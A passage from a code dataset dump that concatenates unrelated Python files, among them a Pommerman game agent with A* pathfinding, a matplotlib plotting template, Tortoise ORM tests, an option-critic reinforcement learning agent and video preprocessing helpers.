1\n\t\t\tArticleName = Article\n\n\n\n\t\tNewTable.append([number, gender, name, link, birth, field, obs, ArticleName])\n\t\n\n\nsite = pywikibot.Site('pt', 'wikipedia')\n\n\n\nNewTable=[]\nifile = open('lista_abc_masculino.json', 'r')\nTable = json.loads(ifile.read())\nifile.close()\n\nparse('M')\n\nifile = open('lista_abc_feminino.json', 'r')\nTable = json.loads(ifile.read())\nifile.close()\nparse('F')\n\n\nprint (len(NewTable))\n\n#print(NewTable)\nquit()\nofile=open('tabela_com_sugestoes.json','w')\njson.dump(NewTable, ofile)\nofile.close()\n","sub_path":"abc/polish.py","file_name":"polish.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"521438951","text":"from collections import defaultdict\nimport queue\nimport random\nimport math\nfrom enum import Enum\n\nimport numpy as np\n\nfrom . import BaseAgent\nfrom .. import constants\nfrom .. import utility\n\n\n# Code for A* pathfinding based off of this article\n# https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2\nclass Node():\n \"\"\"A node class for A* Pathfinding\"\"\"\n\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n\n self.g = 0\n self.h = 0\n self.f = 0\n\n def __eq__(self, other):\n return self.position == other.position\n\n def __hash__(self):\n return self.position.__hash__()\n\n\ndef astar(maze, start, end, passables):\n \"\"\"Returns a list of tuples as a path from the given start to the given end in the given maze\"\"\"\n\n # Create start and end node\n start_node = Node(None, start)\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, end)\n end_node.g = end_node.h = end_node.f = 0\n\n # Initialize both open and closed list\n open_list = set()\n closed_list = set()\n\n # Add the start node\n open_list.add(start_node)\n\n # Loop until you find the end\n while len(open_list) > 0:\n\n # Get the current node\n current_node = min(open_list, key=lambda n: n.f)\n open_list -= {current_node}\n\n # Pop current off open list, add to closed list\n closed_list.add(current_node)\n # Found the goal\n if current_node == end_node:\n path = []\n current = current_node\n while current is not None:\n path.append(current.position)\n current = current.parent\n return path[::-1] # Return reversed path\n\n # Generate children\n children = []\n for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0)]: # Adjacent squares\n\n # Get node position\n node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])\n\n # Make sure within range\n if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0:\n continue\n\n # Make sure walkable terrain\n if maze[node_position[0]][node_position[1]] not in passables:\n continue\n\n # Create new node\n new_node = Node(current_node, node_position)\n\n # Append\n children.append(new_node)\n\n # Loop through children\n for child in children:\n\n # Child is on the closed list\n if child in closed_list:\n continue\n\n # Create the f, g, and h values\n child.g = current_node.g + 1\n child.h = ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)\n child.f = child.g + child.h\n\n # Child is already in the open list\n flag = False\n for open_node in open_list:\n if child == open_node and child.g > open_node.g:\n flag = True\n if flag:\n continue\n\n # Add the child to the open list\n open_list.add(child)\n\n\nclass JukeBot(BaseAgent):\n\n class Desires(Enum):\n FLEE = 0\n KILL = 1\n POWER_UP = 2\n CLEAR_ENV = 3\n HIDE = 4\n\n def __init__(self, *args, **kwargs):\n super(JukeBot, self).__init__(*args, **kwargs)\n self.action_queue = queue.PriorityQueue()\n\n self.beliefs = {'position': (), 'obs': [], 'threats': [], 'powerups': [], 'neighbors':[], 'enemies': [], 'wood': [], 'routes': {}}\n self.desires = [JukeBot.Desires.POWER_UP]\n self.intentions = {'go_to': None, 'avoid': [], 'drop_bomb_at': None, 'wait': None}\n self.current_plan = []\n\n def is_threatened(self, obs, posn):\n r, c = posn\n\n #TODO: go back and look at distance vs bomb strength\n\n # find any bombs in the same row/col as this space\n for b_c in range(10):\n if obs['bomb_life'][r, b_c] > 0 or obs['flame_life'][r, b_c] > 0:\n return True\n for b_r in range(10):\n if obs['bomb_life'][b_r, c] or obs['flame_life'][b_r, c] > 0:\n return True\n\n # check whether or not there's flames here\n if (constants.Item.Flames.value == obs['board'][r,c]) or obs['bomb_life'][r,c] > 0:\n return True\n\n return False\n\n # Find spaces that threaten us\n def find_threatened_spaces(self, obs):\n threatened = set()\n for r in range(len(obs['board'])):\n for c in range(len(obs['board'])):\n if self.is_threatened(obs, (r,c)):\n threatened.add((r, c))\n return threatened\n \n # Get the spaces adjacent to us\n def get_neighbors(self, obs,posn):\n neighbors = []\n BOARD_SIZE =10\n r,c = posn\n\n if r < BOARD_SIZE-1:\n neighbors.append((r+1,c,obs[\"board\"][r+1,c]))\n \n if r > 0:\n neighbors.append((r-1,c,obs[\"board\"][r-1,c]))\n\n if c < BOARD_SIZE-1:\n neighbors.append((r,c+1,obs[\"board\"][r,c+1]))\n\n if c > 0:\n neighbors.append((r,c-1,obs[\"board\"][r,c-1]))\n\n return neighbors\n \n # Returns back board locations of certain objects\n def find_objects(self,obs,item_types):\n found_items = []\n for r in range(len(obs['board'])):\n for c in range(len(obs['board'][0])):\n if obs['board'][r,c] in item_types:\n found_items.append( (r, c) )\n\n return found_items\n\n power_ups = [constants.Item.ExtraBomb.value, constants.Item.IncrRange.value, constants.Item.Kick.value]\n passables = power_ups + [constants.Item.Passage.value]\n\n # Change our current beliefs of the world\n def brf(self,beliefs,obs):\n r, c = obs['position']\n\n beliefs['obs'] = obs\n beliefs['position'] = (r,c)\n beliefs['neighbors'] = self.get_neighbors(obs,beliefs['position'])\n beliefs['threatened'] = self.find_threatened_spaces(obs)\n\n # Only list powerups that are within range\n power_up_list = self.find_objects(obs,JukeBot.power_ups)\n power_up_paths = {power_up: astar(beliefs['obs']['board'], beliefs['position'], power_up, JukeBot.passables) for power_up in power_up_list}\n\n valid_powerups = []\n for power_up in power_up_paths:\n if power_up_paths[power_up]:\n valid_powerups.append(power_up)\n\n \n beliefs['powerups'] = valid_powerups\n\n beliefs['enemies'] = self.find_objects(obs, obs['enemies'])\n beliefs['wood'] = self.find_objects(obs, [constants.Item.Wood.value])\n\n return beliefs\n\n ##TODO: Fix where there's wood left but its impossible to reach and we don't start fleeing.\n\n # See if our intention makes sense\n def reconsider(self, intentions, beliefs):\n dest = intentions['go_to']\n \n if dest and dest in beliefs['threatened']:\n return True\n\n #if next move is threatned\n if dest and dest == beliefs['position']:\n intentions['go_to'] = None\n return True\n \n bomb_dest = intentions['drop_bomb_at']\n if bomb_dest and beliefs['obs']['bomb_life'][bomb_dest[0], bomb_dest[1]] > 0:\n intentions['drop_bomb_at'] = None\n return True\n \n # If the given path contains a threat\n def contains_threat(self, path, threats):\n for node in path:\n if node in threats:\n return True\n\n # Figure out what we should intend to do based off the world and out desires\n def intention_filter(self, beliefs, desires, intentions):\n\n # If we are already at a place we we're intending to go to\n dest = intentions['go_to']\n if dest and dest == beliefs['position']:\n intentions['go_to'] = None\n\n # If we already dropped a bomb at a place we wanted to drop a bomb at\n bomb_dest = intentions['drop_bomb_at']\n if bomb_dest and beliefs['obs']['bomb_life'][bomb_dest[0], bomb_dest[1]] > 0:\n intentions['drop_bomb_at'] = None\n\n # If we want to FLEE\n if desires[0] == JukeBot.Desires.FLEE:\n # Find nearest spot that's empty and not in threats\n safe_spots = set(self.find_objects(beliefs['obs'], [constants.Item.Passage.value])) - beliefs['threatened']\n paths = {location: astar(beliefs['obs']['board'], beliefs['position'], location[0:2], JukeBot.passables+[constants.Item.Bomb.value]) for location in safe_spots}\n \n # Go to that spot\n if paths:\n nearest_safe = min(paths, key=lambda p: len(paths[p]) if paths[p] else np.Infinity)\n dest = nearest_safe[0:2]\n intentions['go_to'] = dest\n beliefs['routes'][dest] = paths[nearest_safe] \n\n # If we want to POWERUP\n elif desires[0] == JukeBot.Desires.POWER_UP and beliefs['powerups']:\n # Find a path to all the powerups\n paths = {powerup: astar(beliefs['obs']['board'], beliefs['position'], powerup[0:2], JukeBot.passables) for powerup in beliefs['powerups']}\n \n if paths:\n # Take the shortest path\n nearest_powerup = min(paths, key=lambda p: len(paths[p]) if paths[p] and not self.contains_threat(paths[p],beliefs['threatened']) else np.Infinity)\n dest = nearest_powerup[0:2]\n path = paths[nearest_powerup]\n\n # If the path contatins a threat, wait\n if path and self.contains_threat(path,beliefs['threatened']):\n intentions['wait'] = True\n\n intentions['go_to'] = dest\n beliefs['routes'][dest] = paths[nearest_powerup] \n\n # If we want to CLEAR THE ENVIRONMENT\n elif desires[0] == JukeBot.Desires.CLEAR_ENV and beliefs['wood']:\n # Find the paths to wood on the board\n \n paths = {wood: astar(beliefs['obs']['board'], beliefs['position'], wood[0:2], JukeBot.passables+[constants.Item.Wood.value]) for wood in beliefs['wood']}\n if paths:\n\n # Find the closest\n nearest_wood = min(paths, key=lambda p: len(paths[p]) if paths[p] and not self.contains_threat(paths[p],beliefs['threatened']) else np.Infinity) \n\n # However, we should check to see if that space is threatened\n path = paths[nearest_wood]\n if path and self.contains_threat(path,beliefs['threatened']):\n intentions['wait'] = True\n\n if path:\n # We also just drop the bomb at the adjacent space, not the actual wood space\n path.pop()\n dest = path[-1]\n\n intentions['go_to'] = dest\n intentions['drop_bomb_at'] = dest\n beliefs['routes'][dest] = path\n\n # Killing is wrong, and bad. \n # There should be a new, stronger word for killing like badwrong or badong. \n # YES, killing is badong!\n # From this moment, I will stand for the opposite of killing, gnodab.\n elif desires[0] == JukeBot.Desires.KILL:\n pass\n\n # If we desire to HIDE from the enemy\n elif desires[0] == JukeBot.Desires.HIDE:\n safe_spots = set(self.find_objects(beliefs['obs'], [constants.Item.Passage.value])) - beliefs['threatened']\n found_enemy = self.find_objects(beliefs['obs'], [enemy.value for enemy in beliefs['obs']['enemies']])[0]\n paths = {location: astar(beliefs['obs']['board'], found_enemy, location[0:2], JukeBot.passables+[constants.Item.Bomb.value]) for location in safe_spots}\n \n if paths:\n farthest_path_location = max(paths, key=lambda p: len(paths[p]) if paths[p] and not self.contains_threat(paths[p],beliefs['threatened']) else -np.Infinity)\n path_to_farthest_location = astar(beliefs['obs']['board'], beliefs['position'], farthest_path_location, JukeBot.passables)\n dest = farthest_path_location\n\n if path_to_farthest_location and self.contains_threat(path_to_farthest_location,beliefs['threatened']):\n intentions['wait'] = True\n \n intentions['go_to'] = dest\n beliefs['routes'][dest] = path_to_farthest_location \n\n return intentions\n\n # Take an A* path of squares and turn it into a list of actions for the agent\n def path_to_actions(self, path):\n actions = []\n for i in range(1,len(path)):\n r_l, c_l = path[i - 1]\n r, c = path[i]\n\n delta = (r - r_l, c - c_l)\n if delta == (-1, 0):\n actions.append(constants.Action.Up)\n elif delta == (1,0):\n actions.append(constants.Action.Down)\n elif delta == (0,1):\n actions.append(constants.Action.Right)\n elif delta == (0,-1):\n actions.append(constants.Action.Left)\n\n # Reverse the order of the actions, so we can pop them properly\n return actions[::-1]\n\n # Make a plan to achieve our intentions\n def plan(self, beliefs, intentions):\n actions = []\n\n # If we intend to wait, do nothing\n if intentions['wait']:\n intentions['wait'] = None\n return [constants.Action.Stop]\n\n # If we indend to go somewhere, pathfind\n elif intentions['go_to']:\n r,c = dest = intentions['go_to']\n if beliefs['routes'][dest]:\n actions = self.path_to_actions(beliefs['routes'][dest])\n \n # Drop a bomb if we intend to\n if intentions['drop_bomb_at'] == dest:\n actions.insert(0,constants.Action.Bomb.value)\n\n beliefs['routes'][dest] == None\n \n # Else, we just stop\n if actions:\n return actions\n else:\n return [constants.Action.Stop]\n\n # Is our plan OK? (Will it get us killed?)\n def sound(self, current_plan, intentions, beliefs):\n\n # If our next move in the plan puts us in danger, replan\n if intentions['go_to']:\n dest = intentions['go_to']\n next_move = current_plan[-1]\n r,c = beliefs['position']\n next_pos = (r,c)\n\n if next_move == constants.Action.Up:\n next_pos = (r-1,c)\n elif next_move == constants.Action.Down:\n next_pos = (r+1,c)\n elif next_move == constants.Action.Left:\n next_pos = (r,c-1)\n elif next_move == constants.Action.Right:\n next_pos = (r,c+1)\n\n if next_pos in beliefs['threatened']:\n safe_board = beliefs['obs']['board'].copy()\n\n for r in range(len(safe_board)):\n for c in range(len(safe_board[0])):\n if (r,c) in beliefs['threatened']:\n safe_board[r,c] = constants.Item.Rigid.value\n\n new_path = astar(safe_board, beliefs['position'], dest, JukeBot.passables)\n beliefs['routes'][dest] = new_path\n return False\n\n # Also reconsider if we don't actually have a plan\n return len(current_plan) > 0\n\n # Set our desires based off of our beliefs and intentions\n def options(self, beliefs, intentions):\n # Most important: if we think we are threatened, get out of danger!\n if beliefs['position'] in beliefs['threatened']:\n return [JukeBot.Desires.FLEE]\n\n #If there's a powerup we can get to, go get it!\n elif beliefs['powerups']:\n return [JukeBot.Desires.POWER_UP]\n\n #If there's still wood to be cleared, clear it!\n elif beliefs['wood']:\n return [JukeBot.Desires.CLEAR_ENV]\n\n #We're pacifists, so run away if there's nothing better to do!\n else:\n return [JukeBot.Desires.HIDE]\n\n def act(self,obs,action_space):\n # A custom agent using the BDI arch.\n\n self.beliefs = self.brf(self.beliefs, obs)\n\n #If we don't have a plan, or we reconsider our current plan, change desires and intentions\n if not self.current_plan or self.reconsider(self.intentions, self.beliefs):\n self.desires = self.options(self.beliefs, self.intentions)\n self.intentions = self.intention_filter(self.beliefs, self.desires, self.intentions)\n \n #If our current plan is not sound, revise current plan\n if not self.current_plan or not self.sound(self.current_plan, self.intentions, self.beliefs):\n self.current_plan = self.plan(self.beliefs, self.intentions)\n\n debug = False\n if debug:\n print(\"D:\",self.desires)\n print(\"I:\",self.intentions)\n print(\"Pos:\",self.beliefs['position'])\n print(\"Plan:\",self.current_plan)\n print(\"---------\")\n\n #This is in case something slips through\n #If we don't have anything to do, just do nothing \n if len(self.current_plan) == 0:\n self.current_plan.append([constants.Action.Stop])\n\n return self.current_plan.pop()\n\n\n","sub_path":"pommerman/agents/juke_bot.py","file_name":"juke_bot.py","file_ext":"py","file_size_in_byte":17498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"161691769","text":"import math\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# -----------------------------------------------------------------------\n# Importing data into dataframes\n# ==================================\n# if \"space(s)\" are used as delimiter in data, add following argument \"delim_whitespace=True\"\n# ex) df1 = pd.read_csv(\"s1.csv\", delim_whitespace=True)\n\ndf1 = pd.read_csv(\"sample.csv\")\n# df2 = pd.read_csv(\"2.csv\")\n# df3 = pd.read_csv(\"3.csv\")\n# -----------------------------------------------------------------------\n\n# -----------------------------------------------------------------------\n# Figure configrations\n# ==================================\n# if you want to set the size of the figure\n# use plt.figure(figsize=(width_inch,height_inch)) 1inch = 2.54cm\n# ==================================\n\nfig = plt.figure()\nplt.rcParams['font.family'] = 'Times New Roman' # fonts\nplt.rcParams['font.size'] = 14 # fontsize\nplt.rcParams['axes.linewidth'] = 1.5 # linewidth of axes\nplt.rcParams['text.usetex'] = True\n# usetex = True: latex description can be used in the figure\n# ex) ax1.set_xlabel(r'$ LATEX DESCRIPTION $')\n# note: if the system says \"type1ec.sty or dvipng is not found\",\n# install them using \"apt install cm-super\" or \"apt install dvipng.\" (Ubuntu)\n# If errors do not go away, set \"plt.rcParams['text.usetex'] = False\"\n\n# -----------------------------------------------------------------------\n# Add subplots to draw multiple graphs in the same figure\n# ==================================\n# add_subplots(i,j,k): define the number and places of the graph\n# i: number of lines in the figure\n# j: number of rows in the figure\n# k: order of the graph in the figure\n# ==================================\n\nax1 = fig.add_subplot(4, 1, 1)\nax2 = fig.add_subplot(4, 1, 2)\nax3 = fig.add_subplot(4, 1, 3)\nax4 = fig.add_subplot(4, 1, 4)\n\n# -----------------------------------------------------------------------\n# Drawing graphs\n# ==================================\nxlim = [0, 5] # xrange for all plots\n\n# 1st plot\nax1.plot(df1[\"time\"], df1[\"angle\"], label=\"angle\", lw=1)\nax1.set_xlim(xlim) # set xrange of the plot: ax1.set_xlim([a,b])\n# ax1.set_ylim() # set yrange of the plot: ax1.set_ylim([a,b])\n# ax1.set_xlabel('time[sec]')\nax1.set_ylabel('Angle [deg]')\nax1.legend() # add a legend(label) of the plot\n\n# 2nd plot\nax2.plot(df1[\"time\"], df1[\"velocity\"], label=\"vel.\", lw=1)\nax2.set_xlim(xlim)\n# ax1.set_ylim()\n# ax2.set_xlabel('time[sec]')\nax2.set_ylabel('Velocity [deg/sec]')\nax2.legend()\n\n# 3rd plot\nax3.plot(df1[\"time\"], df1[\"acceleration\"], label=\"accel.\", lw=1)\nax3.set_xlim(xlim)\n# ax1.set_ylim()\n# ax3.set_xlabel('time[sec]')\nax3.set_ylabel(r'${\\rm Acceleration}\\ [{\\rm deg}/{\\rm sec}^2]$')\nax3.legend()\n\n# 4th plot\nax4.plot(df1[\"time\"], df1[\"state\"], label=\"state\", lw=1)\nax4.set_xlim(xlim)\n# ax1.set_ylim()\nax4.set_xlabel('Time[sec]')\nax4.set_ylabel('State')\nax4.legend()\n# -----------------------------------------------------------------------\n\nfig.align_labels() # align all labels\nplt.show()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"367000242","text":"from typing import Iterable\nimport random\n\nfrom movie_web_app.adapters.repository import AbstractRepository\nfrom movie_web_app.domainmodel.model import Movie\n\n\ndef get_genre_names(repo: AbstractRepository):\n genres = repo.get_genre_list()\n genre_name = [genre.genre_name for genre in genres]\n return genre_name\n\n\ndef get_years(repo: AbstractRepository):\n years = repo.get_year_list()\n year_list = [year for year in years]\n return year_list\n\n\ndef get_random_movies(quantity, repo: AbstractRepository):\n movie_count = repo.get_number_of_movies()\n print(\"movie count\", movie_count)\n\n if quantity >= movie_count:\n # Reduce the quantity of ids to generate if the repository has an insufficient number of articles.\n quantity = movie_count - 1\n\n # Pick distinct and random articles.\n random_ids = random.sample(range(1, movie_count), quantity)\n movies = repo.get_movies_by_id(random_ids)\n\n return movies_to_dict(movies)\n\n\n# ============================================\n# Functions to convert dicts to model entities\n# ============================================\n\ndef movie_to_dict(movies: Movie):\n movie_dict = {\n 'year': movies.year,\n 'title': movies.title,\n 'description': movies.description,\n 'vote': movies.votes,\n 'rate': movies.rating\n # 'image_hyperlink': movies.image_hyperlink\n }\n return movie_dict\n\n\ndef movies_to_dict(movies: Iterable[Movie]):\n return [movie_to_dict(movies) for movies in movies]\n","sub_path":"movie_web_app/utilities/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"280410042","text":"\nfrom sklearn import neighbors, datasets, preprocessing, cross_validation\nfrom numpy import linspace, mean\nboston = datasets.load_boston()\nX = boston.data\ny = boston.target\nX = preprocessing.scale( X )\nkf = cross_validation.KFold( len(y), shuffle=True, n_folds = 5, random_state=42)\n\n\npmax = 0\nresmax = 0\nfor p in linspace(1,10,200, True):\n rgr = neighbors.KNeighborsRegressor( n_neighbors=5, weights='distance',p=p, metric='minkowski')\n scores = cross_validation.cross_val_score( estimator = rgr, X = X, y = y, cv = kf, scoring='mean_squared_error')\n res = mean(scores)\n print( p, res )\n if ( pmax == 0 ) or ( res > resmax ):\n pmax = p\n resmax = res\nprint( pmax, resmax )\n\n","sub_path":"Coursera/w2l1a2/Housing.py","file_name":"Housing.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"587711945","text":"from tortoise.aggregation import Count\nfrom tortoise.contrib import test\nfrom tortoise.tests.testmodels import Event, Team, Tournament\n\n\nclass TestRelations(test.TestCase):\n async def test_relations(self):\n tournament = Tournament(name='New Tournament')\n await tournament.save()\n await Event(name='Without participants', tournament_id=tournament.id).save()\n event = Event(name='Test', tournament_id=tournament.id)\n await event.save()\n participants = []\n for i in range(2):\n team = Team(name='Team {}'.format(i + 1))\n await team.save()\n participants.append(team)\n await event.participants.add(participants[0], participants[1])\n await event.participants.add(participants[0], participants[1])\n\n self.assertEqual([team.id for team in event.participants], [])\n\n teamids = []\n async for team in event.participants:\n teamids.append(team.id)\n self.assertEqual(teamids, [participants[0].id, participants[1].id])\n\n self.assertEqual(\n [team.id for team in event.participants],\n [participants[0].id, participants[1].id]\n )\n\n self.assertEqual(event.participants[0].id, participants[0].id)\n\n selected_events = await Event.filter(\n participants=participants[0].id\n ).prefetch_related('participants', 'tournament')\n self.assertEqual(len(selected_events), 1)\n self.assertEqual(selected_events[0].tournament.id, tournament.id)\n self.assertEqual(len(selected_events[0].participants), 2)\n await participants[0].fetch_related('events')\n self.assertEqual(participants[0].events[0], event)\n\n await Team.fetch_for_list(participants, 'events')\n\n await Team.filter(events__tournament__id=tournament.id)\n\n await Event.filter(tournament=tournament)\n\n await Tournament.filter(events__name__in=['Test', 'Prod']).distinct()\n\n result = await Event.filter(id=event.id).values('id', 'name', tournament='tournament__name')\n self.assertEqual(result[0]['tournament'], tournament.name)\n\n result = await Event.filter(id=event.id).values_list('id', 'participants__name')\n self.assertEqual(len(result), 2)\n\n async def test_reset_queryset_on_query(self):\n tournament = await Tournament.create(name='New Tournament')\n event = await Event.create(name='Test', tournament_id=tournament.id)\n participants = []\n for i in range(2):\n team = await Team.create(name='Team {}'.format(i + 1))\n participants.append(team)\n await event.participants.add(*participants)\n queryset = Event.all().annotate(count=Count('participants'))\n await queryset.first()\n await queryset.filter(name='Test').first()\n","sub_path":"tortoise/tests/test_relations.py","file_name":"test_relations.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"235130741","text":"def s(n):\n l=[]\n limit=int(n**0.5)+1\n for i in range(2,limit+1):\n while n%i==0:\n l.append(i)\n n=n//i\n if n>1:l.append(n)\n return(l)\n \nN=int(input())\n\nans=s(N)\nprint(str(N) + \": \" + ' '.join(map(str,ans)))","sub_path":"初中級者が解くべき過去問精選100/068_素数判定法_NTL_1_A - 素因数分解.py","file_name":"068_素数判定法_NTL_1_A - 素因数分解.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"443486236","text":"#######################################################################\n# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #\n# Permission given to modify the code as long as you keep this #\n# declaration at the top #\n#######################################################################\n\nfrom .BaseAgent import *\nfrom ..utils import *\n\nclass OptionD3PGAgent(BaseAgent):\n def __init__(self, config):\n BaseAgent.__init__(self, config)\n self.config = config\n self.task = config.task_fn()\n self.network = config.network_fn(self.task.state_dim, self.task.action_dim)\n self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)\n self.target_network.load_state_dict(self.network.state_dict())\n self.policy = config.policy_fn()\n\n self.total_steps = 0\n self.episode_rewards = np.zeros(config.num_workers)\n self.last_episode_rewards = np.zeros(config.num_workers)\n self.random_process = config.random_process_fn((config.num_workers, self.task.action_dim))\n\n states = self.task.reset()\n states = self.config.state_normalizer(states)\n self.q_options, self.betas, self.actions = self.network.predict(states)\n self.options = np.asarray([self.policy.sample(q) for q in to_numpy(self.q_options)])\n self.is_initial_betas = np.ones(self.config.num_workers)\n self.prev_options = np.copy(self.options)\n self.states = states\n\n def soft_update(self, target, src):\n for target_param, param in zip(target.parameters(), src.parameters()):\n target_param.detach_()\n target_param.copy_(target_param * (1.0 - self.config.target_network_mix) +\n param * self.config.target_network_mix)\n\n def iteration(self):\n config = self.config\n rollout = []\n\n states = self.states\n q_options, betas, options, actions = self.q_options, self.betas, self.options, self.actions\n for _ in range(config.rollout_length):\n var_options = self.network.tensor(options).long()\n executed_actions = actions[self.network.range(config.num_workers), var_options]\n executed_actions = to_numpy(executed_actions)\n executed_actions += self.random_process.sample()\n next_states, rewards, terminals, _ = self.task.step(executed_actions)\n next_states = self.config.state_normalizer(next_states)\n self.episode_rewards += rewards\n rewards = config.reward_normalizer(rewards)\n rollout.append([states, executed_actions, options, self.prev_options, rewards, 1 - terminals, np.copy(self.is_initial_betas)])\n\n q_options_next, betas_next, actions_next = self.network.predict(states)\n self.is_initial_betas = np.asarray(terminals, dtype=np.float32)\n\n np_q_options_next = to_numpy(q_options_next)\n np_betas_next = betas_next.gather(1, var_options.unsqueeze(1))\n np_betas_next = to_numpy(np_betas_next).flatten()\n options_next = np.copy(options)\n dice = np.random.rand(len(options_next))\n for j in range(len(dice)):\n if dice[j] < np_betas_next[j] or terminals[j]:\n options_next[j] = self.policy.sample(np_q_options_next[j])\n\n for i, terminal in enumerate(terminals):\n if terminals[i]:\n self.last_episode_rewards[i] = self.episode_rewards[i]\n self.episode_rewards[i] = 0\n\n self.prev_options = options\n options = options_next\n q_options = q_options_next\n betas = betas_next\n actions = actions_next\n states = next_states\n\n self.policy.update_epsilon()\n self.total_steps += config.num_workers\n\n self.options = options\n self.q_options = q_options\n self.betas = betas\n self.actions = actions\n self.states = states\n\n target_q_options, _, _ = self.target_network.predict(next_states)\n\n prev_options = self.network.tensor(self.prev_options).long().unsqueeze(1)\n betas_prev_options = betas.gather(1, prev_options)\n\n returns = (1 - betas_prev_options) * target_q_options.gather(1, prev_options) +\\\n betas_prev_options * torch.max(target_q_options, dim=1, keepdim=True)[0]\n returns = returns.detach()\n\n for i in reversed(range(len(rollout))):\n states, actions, options, prev_options, rewards, terminals, is_initial_betas = rollout[i]\n\n is_initial_betas = self.network.tensor(is_initial_betas)\n prev_options = self.network.tensor(prev_options).unsqueeze(1).long()\n terminals = self.network.tensor(terminals).unsqueeze(1)\n rewards = self.network.tensor(rewards).unsqueeze(1)\n returns = rewards + config.discount * terminals * returns\n\n phi = self.network.feature(states)\n actions = self.network.tensor(actions)\n q_options = self.network.critic(phi, actions)\n betas = self.network.termination(phi)\n if not config.off_policy_critic:\n q = q_options[self.network.tensor(np.arange(q_options.size(0))).long(),\n self.network.tensor(options).long()].unsqueeze(-1)\n else:\n q = q_options\n q_loss = (q - returns).pow(2).mul(0.5).sum(1).mean()\n\n q_prev_omg = q_options.gather(1, prev_options)\n v_prev_omg = torch.max(q_options, dim=1, keepdim=True)[0]\n advantage_omg = q_prev_omg - v_prev_omg\n advantage_omg.add_(config.termination_regularizer).detach()\n betas = betas.gather(1, prev_options)\n betas = betas * (1 - is_initial_betas)\n beta_loss = (betas * advantage_omg).mean()\n\n self.network.zero_grad()\n (q_loss + beta_loss * config.beta_loss_weight).backward()\n self.network.critic_opt.step()\n\n phi = self.network.feature(states)\n actions = self.network.actor(phi)\n q = self.network.critic(phi.detach(), actions)\n if not config.off_policy_actor:\n q = q[self.network.tensor(np.arange(q.size(0))).long(),\n self.network.tensor(options).long()].unsqueeze(-1)\n policy_loss = -q.sum(1).mean()\n\n self.network.zero_grad()\n policy_loss.backward()\n self.network.actor_opt.step()\n\n self.soft_update(self.target_network, self.network)\n","sub_path":"deep_rl/agent/DOC_agent.py","file_name":"DOC_agent.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"249341383","text":"import sqlite3\n\ndef create():\n try:\n c.execute(\"\"\"CREATE TABLE mytable\n (start, end, score)\"\"\")\n except:\n pass\n\ndef insert():\n c.execute(\"\"\"INSERT INTO mytable (start, end, score)\n values(1, 99, 123)\"\"\")\n\ndef select(verbose=True):\n sql = \"SELECT * FROM mytable\"\n recs = c.execute(sql)\n if verbose:\n for row in recs:\n print(row)\n\ndb_path = r'/Users/travispbonfigli/bin/PYTHON/INE/inventory.db'\nconn = sqlite3.connect(db_path)\nc = conn.cursor()\ncreate()\ninsert()\nconn.commit() #commit needed\nselect()\nc.close()\n","sub_path":"junk2dbfile.py","file_name":"junk2dbfile.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"247302126","text":"import tensorflow as tf\n\nimport augment_volume_util as avu\n\n#TODO: 3D label stuff for seg, target_image_size is 1 int, can be list for !square images\ndef preprocess_for_train(volume,\n num_frames,\n height,\n width,\n target_image_size,\n list_of_augmentations=[]):\n\n '''Preprocessing volumes during training.\n Args:\n volume: '4D Tensor' [depth, height, width, channels]\n target_image_size: 'Integer' to specify input size\n required by the model\n list_of_augmentations: 'List' of strings specifying\n augmentations to be done\n Returns:\n Augmented '4D Tensor of same dtype as :volume\n '''\n\n get_shape = volume.get_shape().as_list()\n assert len(get_shape) == 4, 'Input shape length should be\\\n 4. Found %d' %len(get_shape)\n if len(list_of_augmentations) == 0:\n print('No augmentations mentioned, function will return\\\n volume unchanged')\n \n ##### Random cropping\n target_dims = [\n num_frames,\n target_image_size,\n target_image_size,\n 3]\n\n if 'random_crop' in list_of_augmentations:\n volume = avu.random_crop_volume(\n volume=volume,\n target_dims=target_dims)\n\n\n '''\n ##### Random flipping\n if 'random_flip' in list_of_augmentations:\n volume = avu.random_flip(\n volume=volume,\n direction='lr')\n '''\n\n ##### Brightness in range [0.0, 0.3)\n if 'random_brightness' in list_of_augmentations:\n volume = avu.apply_brightness(\n volume=volume)\n\n ##### Contrast in range [0.0, 0.3)\n if 'random_contrast' in list_of_augmentations:\n volume = avu.apply_contrast(\n volume=volume)\n\n return volume\n\n\ndef preprocess_for_eval(volume,\n num_frames,\n height,\n width,\n target_image_size,\n list_of_augmentations=[]):\n\n \n ##### Crop center 224*224 patch\n #height, width = get_shape[1], get_shape[2]\n center_x = tf.cast(\n tf.divide(\n height\n if type(height) == int else height[0],\n 2),\n tf.int32)\n\n center_y = tf.cast(\n tf.divide(\n width\n if type(width) == int else width[0],\n 2),\n tf.int32)\n\n offset_height = 